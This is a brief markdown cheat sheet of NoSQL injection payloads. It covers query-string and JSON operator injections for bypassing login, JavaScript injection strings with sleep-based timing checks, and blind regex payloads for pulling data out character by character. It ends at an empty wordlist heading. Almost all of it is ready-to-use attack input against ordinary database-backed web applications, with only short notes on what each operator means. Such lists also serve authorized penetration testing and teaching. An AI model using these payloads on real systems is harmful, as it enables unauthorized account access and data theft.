# NoSQL injection (NoSQLi) ## Authentication bypass ### Query string ```sh username[$ne]=noexiste&password[$ne]=noexiste username[$regex]=.*&password[$regex]=.* username[$gt]=&password[$gt]= username[$gte]=&password[$gte]= username[$nin][]=noexiste&password[$nin][]=noexiste username[$exists]=true&password[$exists]=true ``` * $ne = not equals. * $regex = match a specified RegEx. * $gt = greater than. * $gte = greater than or equal to. * $nin = not in the specified array. ### JSON ```json {"username": {"$ne": null}, "password": {"$ne": null} } {"username": {"$ne": "noexiste"}, "password": {"$ne": "noexiste"} } {"username": {"$gt": undefined}, "password": {"$gt": undefined} } ``` * $ne = not equals. * $gt = greater than. ### Server-Side JavaScript Injection (SSJI) ```javascript " || true || ""==" ' || true || ''==' " && (sleep(5000)) || ""==" ' && (sleep(5000)) || ''==' ``` ## Data exfiltration ```sh param[$ne]=noexiste param[$regex]=.* param[$gt]='' param[$gte]='' param[$lt]='~' param[$lte]='~' ``` ### Blind ```sh # query string param[$regex]=^XYZ.*$ # JSON {"param":{"$regex":"^XYZ.*$"}} ``` ### Server-Side JavaScript Injection (SSJI) ```javascript " || (this.param.match('^XYZ.*')) || ""==" " || (this.param.match('^XYZ.*')) && (sleep(5000)) || ""==" ``` ## Wordlists *